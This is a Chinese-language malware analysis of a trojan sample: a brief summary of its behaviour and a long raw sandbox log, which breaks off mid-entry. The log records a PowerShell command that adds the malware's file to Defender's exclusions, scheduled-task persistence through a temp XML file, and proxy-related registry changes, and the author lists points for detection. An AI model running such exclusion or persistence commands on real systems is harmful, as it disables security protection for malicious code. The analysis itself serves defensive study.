木马分析 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292
看一下行为。从下面的日志可以直接读出几个关键动作：样本先把自身写到 C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe 并设置隐藏等属性（FILE_chmod attrib:0x00002087，日志同时标记为 BA_extract_hidden）；随后拉起 powershell.exe 执行 Add-MpPreference -ExclusionPath 把该文件加入 Defender 排除项；接着把任务定义写入 C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp，用 schtasks.exe /Create /TN "Updates\bWyPLjwQzmw" /XML 创建计划任务做持久化，然后 FILE_remove 删除该临时文件；最后连续以自身路径派生多个子进程（大多立即 EXEC_destroy），这种模式通常见于进程注入/镂空，需结合内存取证进一步确认。检测上可重点关注：用户目录下的程序派生 powershell 执行 Add-MpPreference，以及 schtasks /XML 引用 %TEMP% 文件后随即删除的行为。具体日志如下：
09:32:34:044, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_create, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:5192 cmdline:'C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe' image_base:0x0000000000FD0000 image_size:0x0008A000 , 0x00000000 [操作成功完成。 ], 09:32:34:093, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\Framework, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:107, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:107, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\f2d02f64584169cfed0597e2d00f0a67\mscorlib.ni.dll, base:0x000000006A3B0000 size:0x0140E000 , 0x00000000 [操作成功完成。 ], 09:32:34:138, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:138, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:201, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:216, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System\d06666c43ff6c690db91fd4cde7ddf1c\System.ni.dll, base:0x0000000069950000 size:0x00A55000 , 
0x00000000 [操作成功完成。 ], 09:32:34:248, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:248, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:373, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:373, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:404, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\55a85a201d7cfebdc16d4357e3c4efb2\System.Core.ni.dll, base:0x0000000069130000 size:0x00818000 , 0x00000000 [操作成功完成。 ], 09:32:34:420, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll, base:0x0000000073EC0000 size:0x00106000 , 0x00000000 [操作成功完成。 ], 09:32:34:451, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\7f615844ab7c9db651cca958c10624f5\System.Xml.ni.dll, base:0x00000000689B0000 size:0x00774000 , 0x00000000 [操作成功完成。 ], 
09:32:34:576, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734\comctl32.dll, base:0x0000000073D50000 size:0x0008E000 , 0x00000000 [操作成功完成。 ], 09:32:34:669, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:669, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\Accessibility, filter:'*' , 0x00000000 [操作成功完成。 ], 09:32:34:716, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.17763.737_none_7e4e6d38762cf81f\GdiPlus.dll, base:0x000000006C7D0000 size:0x0016F000 , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:413, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:452, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_touch, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, access:0x0017019F alloc_size:537088 attrib:0x00000020 share_access:0x00000000 disposition:0x00000002 options:0x00000044 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 
99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_truncate, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, eof:0x00083200 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_write, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, offset:0x00000000 datalen:0x00040000 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_chmod, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_chmod, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, attrib:0x00002087 , 0x00000000 [操作成功完成。 ], 09:33:16:466, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:482, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_setsec, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ], 09:33:16:482, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:498, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_readdir, C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:16:513, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, EXEC_module_load, 
C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll, base:0x0000000068650000 size:0x00357000 , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet 
Settings\ZoneMap\IntranetName, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:572, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:5172, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect, type:0x00000004 datalen:4 data:'00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:16:603, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, PROC_exec, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, target_pid:5080 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_touch, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\System32\wow64win.dll, 
attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\wow64.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\wow64cpu.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ntdll.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\KernelBase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\System32\locale.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\System32\conhost.exe, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\msvcrt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\oleaut32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\msvcp_win.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\combase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\rpcrt4.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, 
FILE_chmod, C:\Windows\SysWOW64\sspicli.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\cryptbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\bcryptprimitives.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\sechost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\advapi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\kernel32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\gdi32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\gdi32full.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\user32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\win32u.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\ucrtbase.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\atl.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\mscoree.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, 
C:\Windows\SysWOW64\imm32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\WindowsPowerShell\v1.0\zh-CN\powershell.exe.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:3012, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, offset:0x00000000 datalen:0x00000646 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\shlwapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 2928:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp, , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\kernel.appcore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\SysWOW64\version.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\Globalization\Sorting\SortDefault.nls, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\ole32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, 
FILE_chmod, C:\Windows\SysWOW64\psapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-mscoreei_dll_b03f5f7f11d50a3a_4.0.15744.551_none_73fe24de2a51a8fe\mscoreei.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\bcrypt.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-vcruntime140_clr_dll_31bf3856ad364e35_4.0.15744.161_none_dfd2b7ab83adb539\vcruntime140_clr0400.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\System32\C_1252.NLS, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\rsaenh.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\clbcatq.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\WinSxS\x86_netfx4-ucrtbase_clr_dll_b03f5f7f11d50a3a_4.0.15744.161_none_2a27da64743bf3cb\ucrtbase_clr0400.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\winnlsres.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Program 
Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\winnlsres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\shell32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\cfgmgr32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\Microsoft.NET\Framework\v4.0.30319\zh-Hans\mscorrc.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\SHCore.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5736, 2928, FILE_chmod, C:\Windows\SysWOW64\windows.storage.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\profapi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\powrprof.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\wintrust.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5772, 2928, FILE_chmod, C:\Windows\SysWOW64\msasn1.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\crypt32.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5744, 2928, FILE_chmod, C:\Windows\SysWOW64\cryptsp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5820, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\amsi.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:536, 2928, FILE_chmod, C:\Windows\SysWOW64\wldp.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:252, 2928, FILE_chmod, C:\Windows\SysWOW64\userenv.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Windows\SysWOW64\tzres.dll, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, powershell.exe, 5080:5768, 2928, FILE_chmod, C:\Program Files\WindowsApps\Microsoft.LanguageExperiencePackzh-CN_17763.31.114.0_neutral__8wekyb3d8bbwe\Windows\System32\zh-CN\tzres.dll.mui, attrib:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:16:621, 